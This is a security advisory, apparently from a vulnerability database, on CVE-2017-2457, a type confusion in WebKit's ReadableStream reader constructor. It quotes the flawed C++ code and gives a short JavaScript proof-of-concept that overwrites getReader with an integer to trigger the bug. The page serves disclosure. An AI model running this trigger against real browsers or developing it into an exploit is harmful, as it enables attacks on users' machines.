WebKit constructJSReadableStreamDefaultReader Type Confusion

Published
Credit
Risk
2017.04.10
lokihardt
Medium
CWE
CVE
Local
Remote
N/A
CVE-2017-2457
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

WebKit: Type confusion in constructJSReadableStreamDefaultReader

CVE-2017-2457


EncodedJSValue JSC_HOST_CALL constructJSReadableStreamDefaultReader(ExecState& exec)
{
VM& vm = exec.vm();
auto scope = DECLARE_THROW_SCOPE(vm);

JSReadableStream* stream = jsDynamicDowncast<JSReadableStream*>(exec.argument(0));
if (!stream)
return throwArgumentTypeError(exec, scope, 0, "stream", "ReadableStreamReader", nullptr, "ReadableStream");

JSValue jsFunction = stream->get(&exec, Identifier::fromString(&exec, "getReader")); <<--- 1

CallData callData;
CallType callType = getCallData(jsFunction, callData);
MarkedArgumentBuffer noArguments;
return JSValue::encode(call(&exec, jsFunction, callType, callData, stream, noArguments));
}

It doesn't check whether |getReader| is callable or not.

PoC:

let rs = new ReadableStream();
let cons = rs.getReader().constructor;

rs.getReader = 0x12345;
new cons(rs);

Tested on Webkit Nightly 10.0.2(12602.3.12.0.1, <a href="https://crrev.com/210800" title="" class="" rel="nofollow">r210800</a>)


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com